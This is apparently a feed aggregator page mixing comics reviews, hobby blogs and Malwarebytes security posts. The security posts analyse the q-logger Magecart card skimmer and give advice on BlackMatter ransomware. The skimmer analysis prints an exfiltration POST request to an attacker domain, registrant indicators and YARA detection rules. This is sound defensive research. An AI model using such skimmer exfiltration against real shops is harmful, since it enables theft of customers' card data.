In the Atom backup by Rozakis and Saviuk, an agent of cosmic balance named Mallo (who is drawn so mundanely and specifically, I feel like he has to be a reference to someone but I don't know who) is worried that having an Earth-1 and Earth-2 Atom without the same powers will somehow cause a problematic imbalance. So he switches the Atoms' powers, and Ray Palmer has to go through the issue just being tough and not having shrinking powers. At the end of the issue, Mallo restores Palmer's usual powers and plugs the upcoming "Whatever Happened to the Earth-Two Atom?" feature. This story is logically flawed and a bit silly, but it didn't bore me, which is a win for a backup.

Brave & the Bold #170: Burkett and Aparo bring Batman together with Nemesis, probably to try to build interest in the character who's going to return to the backup feature after this. Nemesis and Batman get to the top of the organization that killed his friend and brainwashed his brother to do the killing. It turns out Head is a guy in an iron lung. Nemesis wants to kill him, but Batman convinces him not to. Still, a dying Nazi scientist does the the job. The story has a nice moment where Batman is examining with professional admiration the quality of one of the masks Nemesis uses as a disguise.

Detective Comics #498: The Conway and Newton/Adkins main story starts out a little confusingly as it is a direct sequel to story from 1979, but they don't tell you that until a few pages in. After his last encounter with Batman, Blockbuster falls into the ocean and is presumed dead.  After washing up on a beach, he walks to Bleak Rock, West Virginia, for some reason where he gets involved in the struggle of miners against a corrupt union boss. Batman has been looking for Blockbuster to show up (perhaps a bit guilty over his death) and flies to West Virginia. He is promptly hit in the back of the head by a goon and thrown into a mine. He's found there by Blockbuster who starts to get enraged and wants to kill him. To be continued!
The backup continues the "Barbara Gordon--Murderer" storyline by Burkett, Delbo and Giella. Commissioner Gordon is back to bail Barbara out of jail and the lawyer she's friendly with agrees to represent her, but she doesn't have much time to clear her name--unless she wants to reveal that she's Batgirl. The prosecution has an invoice signed by her for the poison that killed the Congressman, so Barbara knows her administrative assistant must be in on it. She visits her as Batgirl, and the woman admits the part she played, but she didn't want Barbara to go to jail, only to leverage Commissioner Gordon into letting her brother out of jail. She now knows she was duped. Before Barbara can do anything with this information, thugs bust in, and she in knocked out in the ensuing fight. This continues to be a decent storyline.

Green Lantern #136: There's a lot going on in this Wolfman/Staton yarn. Trying to find out what happened to Carol Ferris, Green Lantern and Tom seek out Bruce Gordon who was at Ferris Aircraft the day of the bombing. Bruce Gordon is Eclipso, though, so a fight breaks out that leads to the collapse of the building. As GL flies to save Tom, he is transported away to a future Earth under siege by the Gordanians. The time jump has left him without his memory. The Space Ranger breaks him out of the hospital to enlist his further aid against the invaders. They manage to find a green lantern in an old weapon cache, so Jordan can recharge. Unfortunately, the Gordanians defeat them all and take them captive. While (well, not really since she's in the past, but you know what I mean) all this is going on, Carol is being hunted Most Dangerous Game-style.
Unsurprisingly, the Adam Strange backup by Sutton and Rodriguez is less interesting than the main feature. There's a sort of planetary Olympics going on on Rann. Strange is competing, but the contests keep getting won by the same stranger in suspicious circumstances. Strange figures out the guy is somehow solar powered and confronts him. It turns out he's a shape-shifted alien who for some reason thinks he will conquer Rann by winning the contest, but when Adam Strange defeats him in one on one combat his species gives up the attempted conquest.

House of Mystery #288: The "cover story" hear is a riff on "The Ones Who Walk Away from Omelas" by DeMatteis and Speigle. A skeleton in a top hat playing a bone flute shows up in an idyllic town once a year to lead away some mentally challenged townsperson. A young man is determined to get his friend back and tracks the Piper to a cave where he is torturing the man he took away. The Piper shows the young hero the River of Souls, where the dark elements of human nature are held--and kept away from the town--so long as they give up one innocent soul a year to be tortured and corrupted by the Piper. Our hero attacks the Piper to free his friend, then the River of Souls is released. The town begins to destroy itself in a frenzy of concentrated badness. Our hero's uncle joins him and the former victim in leaving town. He explains as they go that he had once confronted the Piper over the hero's father but had been too frightened to do anything after seeing the River.
The other stories aren't as good. Barr and Jodloman deliver a short story about a big game hunter shooting a guide in an argument over shooting an endanger wolf, but then it turns out the guide is a werewolf. "Blood in Sand" is a weird story by Gwyon and Redondo about a young matador who wants to win enough to pay the rent on his mother's grave, but his girl's unhappy with the dangerousness of his chosen profession. She's also being pursued by the wealth bull breeder. An old wise woman warns the matador that the next bull he fights will not be as normal bulls, but doesn't quite believe her. In the arena though, he realizes his rival's spirit is somehow guiding the bull. He manages to kill it but dies in the process. No one pays the rent on his mom's grave or his grave, Cain helpfully informs us. The last story by Kanigher and Cruz  is a tale of doomed love and jealous in an Irish fishing community, and is the sort of bland stuff I expect from Ghosts.

Unknown Solider #247: Haney and Ayers and Tlaloc have the Solider infiltrating the Warsaw Ghetto to get information from a Jewish scientist whose "gas diffusion" work will aid the development of the atomic bomb. The old man is dying, but he will only give up the information if the Soldier takes his granddaughter out of the Ghetto. They are on their way out, but they're captured by Jewish resistance fighters who at first thinks the Soldier is a Nazi spy, but won't let them go even after they find out otherwise, fearing that under torture the girl would give away their hiding place. One of the fighters helps them escape into the sewers for the promise of a lot of money, but a German patrol nabs them. The cowardly fighter turns traitor, but the Solider stuffs a cyanide pill in the guy's mouth! He and the girl get away, hiding in a wagon of corpses being removed from the ghetto. Outside, they are again caught by German troops, but the Soldier fakes a heart attack to grab a soldier's rifle. With help from the resistance fighters on the walls, they kill the squad, and he the girl make good their escape. 
Kanigher and Mandrake follow that up with a tale of ancient Greece. After the Battle of  Thermopylae,  a brave shepherd boy kills a Persian commander. The coda remarks that the Persians are now called Iranians and suggests the possibility that their "fanatical leader" might fall to a single blow from a defiant boy. The last story by Burkett and Ayers/Celardo continues the travails of the "Ruptured Duck" from last issue, where the old, worn out plane keeps somehow saving folks' lives--and still breaking down a lot. Part one seemed kind of pointless and part two definitely was.

q-logger skimmer keeps Magecart attacks going

Malwarebytes - Tue, 10/19/2021 - 20:59

This blog post was authored by Jérôme Segura

Although global e-commerce is continuing to grow rapidly, it seems as though Magecart attacks via digital skimmers have not followed the same trend. This is certainly true if we only look at recent newsworthy attacks; indeed when a victim is a large business or popular brand we typically are more likely to remember it.

From a research standpoint, we have observed certain shifts in the scope of attacks. For instance, the different threat actors are continuing to expand and diversify their methods and infrastructure. In a blog post about Magecart Group 8, we documented some of the various web properties used to serve skimmers and exfiltrate stolen data.

But at the end of the day, we only know about attacks that we can see, that is until we discover more. Case in point, one particular skimmer identified as q-logger, has been active for several months. But it wasn’t until we started digging further that we realized how much bigger it was.

Q-logger origins

This skimmer was originally flagged by Eric Brandel as q-logger. Depending on how much you enjoy parsing JavaScript you may have a love/hate relationship with it. The code is dense and using an obfuscator that is as generic as can be, making identification using signatures challenging.

Thanks to some data from @sansecio I've come across a new(?) digital skimmer/#magecart I call "q-logger". It has a variety of features, the most peculiar may be the secondary keylogger it uses to try and defend against inspection. 1/16 pic.twitter.com/ME80KMrNg5

— Eric Brandel (@AffableKraut) April 22, 2021

This skimmer can be found loaded directly into compromised e-commerce sites. However, in the majority of cases we found it loaded externally.

The loader

The loader is also an encoded piece of JavaScript that is somewhat obscure. It is injected inline within the DOM right before the text/x-magento-init tag or separated by copious amounts of white space.

One way to understand what the code does is by using a debugger and setting a breakpoint at a particular spot. It is best to either use an already compromised site or bypass the check for the address bar (onestepcheckout).

We can now see the purpose of this script: it is to load the proper skimmer.

The skimmer

As mentioned previously, the skimmer is quite opaque and makes debugging effort difficult and lengthy.

To cut to the chase, the skimmer exfiltrates data via a POST request to the same domain name where the JavaScript is loaded from.

POST https://filltobill5.casa/ HTTP/1.1
Host: filltobill5.casa
[obfuscated data] Threat actor and victims

We were able to collect a few indicators from the threat actor behind this campaign. One was the use of netmail.tk, also observed by Luke Leal, for registering skimmer domains.

Although there are clusters of domains from the same registrant, we see that they are trying to compartmentalize their infrastructure and hide the hosting provider’s true IP address. They also register domains en masse, which allows them to defeat traditional blocklists.

We don’t have a good estimate of how prevalent this campaign is, but we certainly run into it regularly while monitoring e-commerce sites for malicious code. The victims are various small businesses with an online shop running Magento.


The large number of e-commerce sites that are running outdated versions of their CMS is a low hanging fruit for threat actors interested in stealing credit card data. In a sense, there is always a baseline of potential victims that can be harvested.

And every now and again, some opportunities appear. They could be as simple as a zero-day in a plugin or CMS, or maybe an entry point into more valuable targets via a supply-chain attack.

Threat actors are always ready to pounce on those and may well have established their infrastructure ahead of time, waiting for such opportunities.

Malwarebytes customers are protected against this skimmer.

Indicators of Compromise

Email addresses (registrant)

  • wxugvvvu@netmail[.]tk
  • isgskpys@netmail[.]tk
  • zulhqmnr@netmail[.]tk
  • yzzljjkmc@emlhub[.]com
  • foyiy11183@macosnine[.]com

Skimmer domains




Skimmer URLs



YARA rules

rule qlogger_loader_WebSkimmer : Magecart WebSkimmer {     meta:         author = "Malwarebytes"         description = "Magecart (q-logger loader)"       source = "https://blog.malwarebytes.com/threat-intelligence/2021/10/q-logger-skimmer-keeps-magecart-attacks-going/"         date = "2021-10-19"   strings:         $regex = /"load",function\(\)\{\(function\(\)\{/         $regex2 = /while\(!!\[\]\)\{try{var/         $regex3 = /\(\w\['shift'\]\(\)\);\}\}\}/   condition:         all of them } rule qlogger_skimmer_WebSkimmer : Magecart WebSkimmer { meta: author = "Malwarebytes" description = "Magecart (q-logger skimmer)" source = "https://blog.malwarebytes.com/threat-intelligence/2021/10/q-logger-skimmer-keeps-magecart-attacks-going/" date = "2021-10-19" strings: $regex = /return\(!!window\[\w{2}\(/ $regex2 = /\w\(\)&&console\[/ condition: all of them }

The post q-logger skimmer keeps Magecart attacks going appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Protect yourself from BlackMatter ransomware: Advice issued

Malwarebytes - Tue, 10/19/2021 - 16:33

Despite promises made by the BlackMatter ransomware gang about which organizations and business types they would avoid, multiple US critical infrastructure entities have been targeted. Now, the Federal Bureau of Investigation (FBI), in conjunction with the Cybersecurity and Infrastructure Security Agency (CISA), and the National Security Agency (NSA) have issued a warning on BlackMatter ransomware, and tips on how to avoid it.

BlackMatter ransomware

BlackMatter is a ransomware-as-a-service (RaaS) that allows the developers to profit from cybercriminal affiliates who deploy it against victims. BlackMatter is a possible rebrand of DarkSide, and has some similarities to REvil. According to its own site:

 “The project has incorporated in itself the best features of DarkSide, REvil and LockBit”

Promises, promises

On their own leak site, the BlackMatter gang claim not to attack companies belonging to the following six industries, with the caveat that if or when any companies in these industries do get hit, such victims should simply ask for a free decryption:

  • Hospitals
  • Critical infrastructure facilities (nuclear power plants, power plants, water treatment facilities)
  • Oil and gas industry (pipelines, oil refineries)
  • Defense industry
  • Non-profit companies
  • Government sector

A recent high-profile victim of BlackMatter was Japan-headquartered manufacturer Olympus which, among others, produces medical equipment. BlackMatter is also named as the likely culprit behind the cybersecurity incident affecting US farmers’ cooperative NEW Cooperative.

All in all, the BlackMatter group have performed attacks against several US-based organizations and demanded ransoms ranging from 80 thousand to 15 million US dollars in Bitcoin and Monero.

How to avoid BlackMatter ransomware

CISA alert lists technical details in the form of Tactics, Techniques, and Procedures (TTPs) based on the MITRE ATT&CK for Enterprise framework, detection signatures, and mitigations.

Most of the mitigation strategies will look very familiar to our regular readers, but it’s always worth repeating them. And you may spot some new ones.

  • Use strong and unique passwords. Passwords shouldn’t be reused across multiple accounts or stored on a system where an adversary may gain access. Devices with local administrative accounts should implement a password policy that requires strong, unique passwords for each individual administrative account.
  • Implement and require Multi-Factor Authentication (MFA) where possible and especially for webmail, virtual private networks, and accounts that access critical systems.
  • Patch and update. Keep all operating systems and software up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats.
  • Limit access to resources over the network. Remove unnecessary access to administrative shares, restrict privileges to only the necessary service or user accounts and perform continuous monitoring for anomalous activity. Use a host-based firewall to only allow connections to administrative shares via Server Message Block (SMB) from a limited set of administrator machines.
  • Implement network segmentation and traversal monitoring. This will hinder an adversary from learning the organization’s enterprise environment. Many attackers use system and network discovery techniques for network and system mapping.
  • Implement time-based access for accounts set at the admin-level and higher. BlackMatter operatives have been noticed to use compromised credentials during non-business hours, which allows them to go undetected for longer periods.
  • Disable command-line and scripting activities and permissions. Privilege escalation and lateral movement often depend on software utilities that run from the command line.
  • Implement and enforce backup and restoration policies and procedures. Doing backups right is not as easy as some may think. Make sure they are recent, cannot be altered or deleted, and cover the entire organization’s data infrastructure.

Furthermore, CISA, the FBI, and NSA urge critical infrastructure organizations to apply the following additional mitigations to reduce the risk of credential compromise:

  • Disable the storage of clear text passwords in LSASS memory.
  • Consider disabling or limiting New Technology Local Area Network Manager (NTLM) and WDigest Authentication.
  • Implement Credential Guard for Windows 10 and Server 2016.
  • Minimize the Active Directory (AD) attack surface to reduce malicious ticket-granting activity. Ticket Granting services can be used to obtain hashed credentials that attackers attempt to crack or use in pass-the-hash methods.
Bad things happen

If, despite your best efforts, a ransomware incident occurs at your organization, CISA, the FBI, and NSA say US-based organizations should:

Stay safe, everyone!

The post Protect yourself from BlackMatter ransomware: Advice issued appeared first on Malwarebytes Labs.

Categories: Techie Feeds

REvil ransomware disappears after Tor services hijacked

Malwarebytes - Tue, 10/19/2021 - 13:42

With some pests you hope they never recover from a blow. It’s almost too good to be true, but one can hope. This is one of them. The REvil ransomware group has shut down their operation for the second time this year after losing control over their Tor-based domains.

Shutdown number 1

REvil’s first shutdown was in July 2021, after the gang successfully pulled off a supply chain attack against Managed Service Provider Kaseya. Shortly after this widespread incident all online traces of the gang weirdly seemed to vanish from the internet. In particular, the payment sites and data leak site were taken offline, along with the infrastructure for victims to make Bitcoin payments and get the decryption tools.

A lot of speculation ensued but there were no definite answers. Some said the group had joined forces with the DarkSide group to come back stronger under the name BlackMatter. Others claimed a victory for the good guys, hoping, almost against the odds, that some of the countermeasures taken by governments across the globe were starting to produce results. The Kaseya attack certainly had such an impact worldwide that it brought the full attention of international law enforcement to the group.

The group’s own story is that one of the group’s leaders took down the servers and disappeared with the group’s money, which left them unable to pay many of their affiliates.

The comeback

Unfortunately, a few months later, the REvil ransomware gang made a comeback, attacking new victims and publishing stolen files on a data leak site. The Tor payment and negotiation sites suddenly turned back on as well, with the timers for all prior victims reset to the day the infrastructure went offline.

Shutdown number 2

This time the shutdown looks to be a result of a hostile take-over. This week, the gang’s Tor payment portal and data leak blog were allegedly hijacked, and a spokesperson for the group said the server was compromised. The threat actor’s post on an underground forum said the group’s Tor services were hijacked and replaced to point to a different location.

And again speculation comes into play.

Allegedly, many affiliates were still waiting to be compensated for the losses they suffered when the group last disappeared. On top of that there are rumors that the developers of the ransomware hid a backdoor in their code, so that they can forego their affiliates and provide decryption keys directly to victims.

This doesn’t really make sense, in my view. But it is possible that a key exists that can decrypt the files of multiple, or maybe even all, victims. It wouldn’t be the first time.

Either way, cybercriminals that operate under covert identities rely on a strong base of trust if they want to continue to work together. And that trust in REvil seems to be at a low level, and may be totally gone depending on how this disappearing act turns out.

torcc file

In all the reports about the server takeover there is a mention of the torcc file. This is a text file that holds the configuration details for a Tor instance. The spokesperson for REvil claimed that the path to their hidden service was deleted and the attacker raised their own, hoping that they would go there. Basically, the hidden service in the torcc file is what points visitors of an .onion site to the correct webserver. Being able to alter that file requires a high level of access.

So, who do you think is responsible? Let us know in the comments. I have prepared a few choices, but obviously you can add your own options.

Option 1: An angry affiliate that has had enough.

Option 2: It was an inside job and yet another admin fled the scene with the money.

Option 3: Law enforcement shut down the operation and is now after the people behind it.

Option 4: A white hat hacker that wishes to remain anonymous for safety’s sake.

Option 5: It was just a glitch and they will be back next week, maybe under another name.

Option 6: It was the former group’s leader who was not amused to learn about the comeback.

Wink if you are not guessing, but know for a fact.

The post REvil ransomware disappears after Tor services hijacked appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Tasha’s Rules for Custom Origins Make Pencil-Necked Mountain Dwarves Overly Good

DM David - Tue, 10/19/2021 - 12:17

I played Rime of the Frostmaiden in a party that included the sort of armored dwarven wizard empowered by two features: (1) a weak dwarf’s ability to wear stout armor without a speed penalty and (2) the customized origins from Tasha’s Cauldron of Everything, which let players assign their race’s ability score bonuses to any ability score. This dwarf started with a Strength of 8 and level of fighter for heavy armor proficiency, but some characters gain similar benefits by opting for a mountain dwarf and gaining proficiency with medium armor.

We both played wizards who boasted similar offensive power, except his wizard never got hit. When the character returned at high levels for my D&D weekend, a shield spell routinely boosted his AC into the 30s.

Aside from a monk with high-wisdom and Stunning Strike, I suspect the character type that dungeon masters find most tiresome combines high AC and the ability to cast shield. We DMs can be fans of the characters and want to land an occasional attack. I love Superman, but I also love the threat of a robot powered by a kryptonite heart.

Tasha’s custom origins improve D&D by giving players freedom to play the character they want without choosing ability scores that make the character less effective than others. In an appearance on Dragon Talk, lead D&D designer Jeremey Crawford says, “All games are about making choices and making meaningful choices, but we want the choices to be between things that are all fun and interesting. What we don’t want is a choice where just hiding inside it is some kind of trap. And that’s what the traditional ability score bonuses often feel like to people.

“As the game continues to evolve, and also as the different types of characters people make proliferate and become wonderfully diverse, it’s time for a bit more of those old assumptions to, if not pass away, to be something that a person can set aside if it’s not of interest for them and their character.” The Tasha’s rules create a game that helps gamers imagine and create a broader spectrum of viable characters. “You can play the dwarf you want to play. You can play the elf you want to play. You can play the halfling you want to play.”

Does the new freedom fuel more powerful characters? Jeremey says no. “Contrary to what many people might think, those ability score increases that are in those different options, they are not there for game balance purposes. They are there strictly to reinforce the different archetypes that have been in D&D going back all the way to the 70s.”

The game’s design gives smaller ability score bonuses to races with more potent racial features. Jeremey contends that where players put the ability score bonuses doesn’t matter.

Except the placement matters. Before custom origins, mountain dwarves gained a +2 Strength along with medium armor proficiency—a feature that rarely benefits characters who gain from a +2 strength. Fighters and paladins get armor proficiency anyway; barbarians and monks avoid armor. For wizards and other classes that actually need armor, that +2 Strength offers nothing. To the Player’s Handbook designers, this combination of strength and armor proficiency seemed like such useless fluff that mountain dwarves gained +2 in two ability scores rather than just one. Besides, Strength is a roleplaying choice for sub-optimal characters..

I suspect that if Jeremey failed to save against a suggestion that forced the whole story, he would admit that the placement of modifiers does matter, but not enough to derail adding the simple and flexible custom origins in Tasha’s. Mountain dwarves rank as strong, but not overpowered.

Still, if the designers gained a redo on the dwarf, surely the race’s mechanics would change. In the case of dwarves, the custom origin rules go beyond enabling unique characters who defy class archetypes. The rules encourage pencil-necked dwarf wizards able to wear half-plate. I’ve learned to accept characters who sell out to seldom get hit, but acceptance comes easier when the price isn’t a bargain. Nonetheless, if I were king of D&D, custom origins and their flexibility would stay despite the adventuring parties suddenly filled with clanking dwarven wizards.

Categories: Tabletop Gaming Blogs

Just do it

Yarn Harlot - Mon, 10/18/2021 - 22:39

Lately, I have taken to working occasionally from the what’s become my “upstairs office” which is – well. It’s my bed. In the first autumn of the pandemic something in me snapped and for the life of me I suddenly couldn’t figure out why Joe and I were sleeping on a tiny crappy mattress that was more than twenty years old.  The thing was second hand when it was new to us, and it was way, way past its best before date. It was too small too – when Elliot was with us it just meant he kicked us all night, and I guess I’d really come to hate that bed a lot, but somehow back when we travelled a lot I got breaks from it and didn’t mind it so much.  Cue the lockdown(s) and suddenly it became the focus of everything that was wrong in the world. Everything. Covid? No, I can handle that. Living in the city with the longest lockdown in the world? No, I am not upset about that in the least. Being separated from my loved ones, friends and career and yarn stores? No, none of that is a problem, it was just the STUPID BED.

I finally ordered a new one, sight unseen. I had a conversation with a nice lady named Dory at a bed store and I just bought what she suggested, which was some hybrid blah blah, king size and I had her ship it here.  A friend asked if it wasn’t kind of strange to buy a bed without even lying in it first, but all the shops were closed on account of the lockdown, I’d snapped and – as I told the friend, the great thing about sleeping in a really, really terrible bed for a really, really long time is that truthfully, any bed that Dory sent over here was going to be such an upgrade it didn’t matter much. Before the bed came, I scrubbed every inch of the bedroom, repainted, got new curtains, new sheets, and a new duvet. I even bought a lamp. It was time and I love it. The bed, the room, the everything. Our bedroom is one of the brightest rooms in the whole house, and with Joe still working from home its often one of the quietest, and now that my entire life is lived in stretchy pants and wool slippers, it makes total sense to have a bed-office. (It also doesn’t help that I’ve filled my actual office with the setup for filming the Patreon. At least up here I don’t have to worry about knocking over the weird card-table-tripod setup I’ve got going on down there.)

So, here I sit, with an awesome cup of tea (recently have become addicted to Monarch Tea Company’s Cream Earl Grey) and I’ve brought up my knitting, and as soon as I’m done writing this I am definitely not working on this sock until I have finished Ken’s sweater.

Yarn is the precious and heartbreakingly discontinued Dream in Color Everlasting  in Victoria. (Dream in color still makes great yarn, just not this one.) and the pattern is Verbena Socks.  It’s great fun, and I’m even enjoying the colour, and you can write that down somewhere – that I was grooving on a purple yarn, because knitters it is most definitely not my favourite colour. I wonder if it’s partly because for some terrible reason, I have developed an aversion to knitting on Ken’s sweater, for no good reason, I might add.  I love the yarn, it’s a good pattern and I’m so close to finishing it should be all I want to work on. I think I’ve only got about 12 more rows of brioche to do on the back of the thing and then all it needs is a bath and a bit of assembly and a neckband.

This, I think we can all agree – is not much.  Yeah verily it is very little, and I can’t tell you why every single time I pick it up it just seems like a slog. I’ll knit two rows and then find myself thinking things like “Goodness me, I shouldn’t be knitting this! Look at that sock. It’s far more urgent” and then off I go to knit… well, anything else, really. It makes no sense, but has been good for getting other things done around here, because it turns out I’d rather do anything at all than finish this – even clean. Somehow, I’ve put it on the list of things I will do immediately once everything else is done and naturally everything else is never going to be done, especially if I keep starting things, which I am absolutely doing.

So, here it stops, today.  I’m not knitting anything else until this is in the bath. If nothing else, it’s started glaring at me, and I can feel it looking at me with judgement. Once inanimate objects start taking on a personality it’s past time to get them out the door.

This ends today, sweater.

Categories: Knitting Feeds

RICH INTERVIEWS: Nathan Kempf Curator/Letterer for Adventures Everywhere: A Comic-Book Anthology for Kids

First Comics News - Mon, 10/18/2021 - 22:20

Rich: How did you get into Lettering comic books?

Nathan: Honestly, it was a “right place, right time” kind of situation. My partner and I went to a local comic-book shop here in France where Mateus Santolouco (TMNT) was signing some books. There, I met the people taking care of localizing comic-books (translating and adapting the lettering) for the French market, and I asked if they had a place for me, to which they answered “yes”. I worked for them for around two years as a localizing letterer, and then had the ambition of working on original stories instead of just localizing them and worked my way up from there. I now letter full-time.

Rich: What one of your published works stands out the most for you?

Nathan: When it comes to French books, I had the chance to work on a 60 issues series telling the entire History of my country, L’Histoire de France en Bande Dessinée, published by Hachette Collection. It was talked about on TV, newspapers, … and it allowed people to learn about this subject in a more accessible way, so I’m very proud to have worked on it.

When it comes to American comic-books, it would be Deadbox, published by Vault. I started lettering US comic-books in early 2020, so getting to work for such a popular publisher after so little time, and on an amazing story like this one feels unreal to me. I also got to letter this series through AndWorld Design. The founder Deron Bennet is a letterer I truly look up to, so working through his studio is incredible.

Rich: Why use an anthology format?

Nathan: I feel like the anthology format fits perfectly with a child’s attention span. On a more serious note, all kids will not relate to the same stories, which is normal, so it felt weird for me to release one story and just be satisfied with it. The anthology format also allows for creators from different backgrounds to come and tell a story they want to tell, and for more kids to be able to relate to this book. It’s important, especially in these times when the future is as unpredictable as ever. Going for an anthology format just felt right.

Rich: What is the theme throughout the anthology and why?

Nathan: Throughout this book, I wanted to show kids that anything can be an adventure (hence the name Adventures Everywhere). Whether you are trying to find an amazing place to eat dessert, moving to the other side of the country, or finding out who you really are, you will be put in a position of learning, growth, self-discovery, doubts, and so much more. I believe it is important to show kids it’s normal to go through those cycles, and that it may take time for them to discover who they want to be and carve their own path. In that way, life is an adventure, and I hope it will give hope to the kids reading this anthology.

Rich: Will this anthology inspire children and children of all ages?

Nathan: I truly believe so. We have stories for everyone: a fire-breathing hamster saving turtles, a child finding the perfect gift to their newborn sibling, the experience of a disabled teenager going to their first pride parade. Most issues faced by today’s youth are showcased in this book, so I’m convinced they will all be able to relate to the stories, find comfort in them, and also find inspiration.

Rich: Who are Jes & Cin and why are they important to “Adventures Everywhere: A Comic-Book Anthology for Kids”?

Nathan: JesnCin (short for Jessica and Jacinta Wibowo) are Indonesian identical twins who write and illustrate their own stories, such as LUNAR BOY under Harper Alley in 2023, and they are the ones who illustrated the cover for the anthology. A cover is so important, because it is the first thing people will see when looking at a book, and I feel like they did the job perfectly. Communication with them was easy and we got on the same foot quickly, which shows in the final product. Them being driven by creating empowering stories for younger readers was a huge bonus. Finding a cover artist was a very long process for me, but I couldn’t be any happier with the result.

Rich: How did you go about getting others involved in the making of “Adventures Everywhere: A Comic-Book Anthology for Kids”?

Nathan: Honestly, just an open call on Twitter. I have no prior experience in curating an anthology and I’m not well known in the comic-book world, so I was honestly not expecting people to answer the call, but it seemed like the easiest way for me to reach other creators. I ended up with hundreds of submissions and a lot to review, but it gave me the chance to find the stories and artists I truly believed in the most.

Rich: Who are a few of the talented people involved with this anthology?

Nathan: I’m lucky to have amazing creators working on this anthology! We have a foreword by Stephanie Cooke (Oh my Gods!), and stories by people such as Shadia Amin (Spider-Ham: Great Power, No Responsibility), Jordan Alsaqa (Raise Hell!), Brittany Matter (Into the Sunset), Quade Reed, and so many more.

Rich: How did you find the job of Curator challenging?

Nathan: The hardest part was reviewing and selecting stories. I think I went through 6 rounds a trimming down until I had a satisfying number of stories left. Curating the anthology was challenging as a whole, but I think it is mostly due to it being my first time. If there is a next time, I know the entire process will be easier, I already learned a lot about what I could have done better.

I’m also very lucky to have experienced people helping me on the backend before the anthology launches (Brittany Matter helped me a lot setting up the Kickstarter campaign page, and James Emmett is taking care of PR, which is a huge relief).

Rich: After this anthology what will you be working on next?

Nathan: I will be lettering, mostly. I have also written a mini-series called The Gaia Theory, that I am currently pitching to publishers. If it doesn’t work, it will go to Kickstarter early in 2022.

I am also working on two kids’ graphic novels, Ahoy! and The Road of the Dandelions, whenever I have the time, hoping to have them out there in the next few years.

Also, if this anthology’s campaign is a success, I already know the theme of the next one (and yes, it will still be for kids).

Rich: What other comics would you recommend?

Nathan: Oh, that’s a tough one! Lately, I’ve been binge reading (again) Saga and Locke & Key, they’re amazing stories that I could read repeatedly. I’m also a big fan of Tom Taylor’s Nightwing and Superman: Son of Kal-El.

When it comes to middle-grade / young-adult books the Marvel stories published by Scholastics are truly great (Miles Morales: Shock Wave, Spider-Ham: Great Power, No Responsibility, …). Actually, comic-book wise, I feel like kids can’t go wrong with Scholastic’s books.

Rich: Why use kickstarter and what is the url for this one?

Nathan: Kickstarter is a great way for projects like this anthology to actually see the light of day. Between paying creators, printing costs, and all the different expenses, such a book can very easily cost more than $10K to create. Funding it through Kickstarter is an amazing way to connect with fans and peers, while making sure there will be people to support the book when it’s out there.

You can find the campaign at

Rich: Why do you love comic books?

Nathan: This medium is truly amazing, I feel like it has the best parts of all other storytelling mediums. It’s kind of a like a novel, but you’re not limited to words to tell your story. Your visual storytelling is also not limited by a budget like movies can be. To me, comic-books are the absolute best way to tell compelling stories and have it easily available to everyone. I mean, just look at how popular Webtoon is, and how many people are creating stories for this platform only.

Rich: Any words for the fans who support this anthology?

Nathan: Thank you, from everyone involved. Your support matters so, so much, and we couldn’t make this project without you. If the campaign succeeds, I cannot wait to have all your feedback, and I hope you will enjoy reading it as much as we enjoy creating it.

Categories: Comic Book Blogs

DC Fandome DC  Reveals: Direct Statues and THE BATMAN MOVIE  Action Figures!

First Comics News - Mon, 10/18/2021 - 22:13

Check out McFarlane Toys reveals from DC Fandome!

DC FanDome 2021 raised the bar and revealed for the FIRST TIME EVER spectacular
NEW McFarlane Toys DC Direct Statues!

Plus the launch of the first wave of THE BATMAN Movie Action Figure collection!


Legendary Comic Artist and McFarlane Toys CEO Todd McFarlane shared new details about McFarlane Toys recently announcing a partnership with DC Direct to create new DC collectibles and revealed the FIRST LOOK of the McFarlane Toys DC Direct lines!



In 2022, McFarlane Toys will start releasing  BRAND NEW DC statues and figures, including:

  • The first-ever created The Batman Movie Statues of the  BATMAN and THE RIDDLER in time for its theatrical release.
  • A new statue, Joker: Purple Craze, based on superstar artist Greg Capullo’s The Joker from Batman: Death in the Family
  • Continue the incredibly popular Batman Black & White line with a stunning statue by Mike Mignola that offers a unique companion piece to the other Black and White Statues
  •  McFarlane Toys The BATMAN Movie DC Multiverse action figures featuring Batman, Catwoman, The Riddler and the Batcycle.  All figures sold separately.

You can NOW pre-order some of our VERY FIRST figures from The Batman movie DC Multiverse line and PRE-ORDER the FOUR DC Direct Statues revealed during DC Fandome!

Categories: Comic Book Blogs


First Comics News - Mon, 10/18/2021 - 22:09

Creators George Mann and Aleta Vidal Explore the End of The World in New Graphic Novel’ MOTHERBRIDGE

MILWAUKIE, Ore., (October 19, 2021)Dark Horse Comics is pleased to announce a new original graphic novel that explores motherhood and myth in the dystopian fantasy MOTHERBRIDGE: Seeds of Change. This new, emotionally rich epic from Sunday Times bestselling creator of Newbury & Hobbes George Mann and rising artist Aleta Vidal arrives May 2022.


In the aftermath of a failed utopia, an exiled woman fights to be reunited with her children by harnessing the mythic power that changed the planet forever.


Twenty years ago, the World Mother awoke, forming an enormous “worldbridge” from manmade ruins and knotted vegetation that spanned the globe. Borders fell, millions migrated, and legendary creatures returned to the forests. But recently, the World Mother has gone silent, and the worldbridge has begun to wither. Borders are being reinstated. Now, one woman, cast out by her adoptive nation, must assemble a team of outcasts to reawaken the World Mother and bring down the wall separating her from her family.


“Motherbridge is a story very close to my heart, and one that’s been bubbling away in my subconscious for many years. In some ways it’s a reaction to the global difficulties we’re all living through at the moment—climate change, species extinction, isolationist politics—but it’s also very much a story of hope and love. At its heart, this is a tale about family, both biological and found, and about how even the smallest acts of compassion can change the world for the better. It’s been a joy to work on this book with Aleta and watch her bring Hayley and her world to stunning, vivid life.” – George Mann


“It took a second from when I received the proposal to work on this project until I accepted it, I felt it was for me from minute one.  This story is a tribute to diversity and love for our world, with a family finding each other in the middle and enlarging it along the way.  this is a great love story.  Working on things that I believe in, teaming up with people who share those beliefs like George, gives me the strength to carry them out. I’ve draw from the soul every line.” – Aleta Vidal


MOTHERBRIDGE: Seeds of Change arrives in comic shops May 18, 2022 and bookstores May 31, 2022 and is available for pre-order now through Amazon, Barnes and Noble, and your local comic shop for $19.99.

Categories: Comic Book Blogs


First Comics News - Mon, 10/18/2021 - 22:07

Title: ANT # 1
Publisher: Image Comics
Story/Art/Color: Erik Larsen
Flats: Mike Toris
Letters: Jack Morelli
Harworking Farm Boy: Josh Eichhorn
Based in part on the work of: Mario Gully
